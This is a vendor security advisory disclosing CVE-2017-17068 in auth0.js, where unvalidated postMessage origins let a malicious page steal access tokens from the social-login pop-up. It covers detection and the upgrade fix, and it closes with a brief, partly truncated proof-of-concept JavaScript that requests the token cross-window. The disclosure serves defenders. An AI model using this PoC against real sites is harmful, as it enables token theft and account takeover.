Enter your email below to sign up for latest updates from Appcheck NG.


Simply complete the info below and we'll send you all you need to activate AppCheck NG and undertake your FREE scan.

Please enter individual IP addresses or ranges

Please enter full URLs for your web applications, and both http and https where appropriate

AppCheck Discovers Vulnerability in Auth0 Library (CVE-2017-17068).

AppCheck discovered a security flaw within the auth0.js JavaScript library that could be exploited by a malicious website to read sensitive access tokens cross-domain.

About Auth0

Auth0 provides authentication solutions for a variety of platforms including the ability to integrate social media authentication into an application.

“We solve the most complex identity use cases with an extensible and easy to integrate platform that secures billions of logins every month” – https://auth0.com/

Token Disclosure Vulnerability

AppCheck identified a security flaw within the Social Media authentication flow employed by the auth0.js client library. In brief, the following authentication flow is followed when authenticating via Facebook or Google using auth0.js :

A vulnerability occurs since the origin and target of postMessage events between the pop-up window and the requesting page are not validated. i.e. Message event handlers will process messages from, and reply to, any website that submits the event. It is therefore possible for a malicious web page to open a pop-up for an authenticated user and intercept the sensitive access token. The attacker could use the token to then carry out actions on behalf of the user or read sensitive user information.

Detecting the Vulnerability

AppCheck was able to detect this security flaw without any specific updates, reporting the vulnerability as “HTML5 postMessage information disclosure”. However, a specific plugin has been added to properly categorise the vulnerability to aid in remediation:

Resolving the Vulnerability

Developers using the auth0.js library need to upgrade to the latest version: 8.12.

Further details can be found on the vendors official website:


Proof of Concept

The following Proof of Concept JavaScript can be used to demonstrate the vulnerability. The auth_url variable should be populated with the pop-up URL used in the target authentication flow


function request_token(event){
    // when message is recieved send request back a request for the access_token
    data = JSON.parse(event.data)
    if (data.a =="ready"){
        window.poc.postMessage('{"a":"request"}', '*');

function popup(){
   var auth_url = "https://<target URL>/authorize?client_id=<client_id>&response_type=token&connection=facebook...."
   window.poc = window.open(auth_url);
window.addEventListener("message", request_token)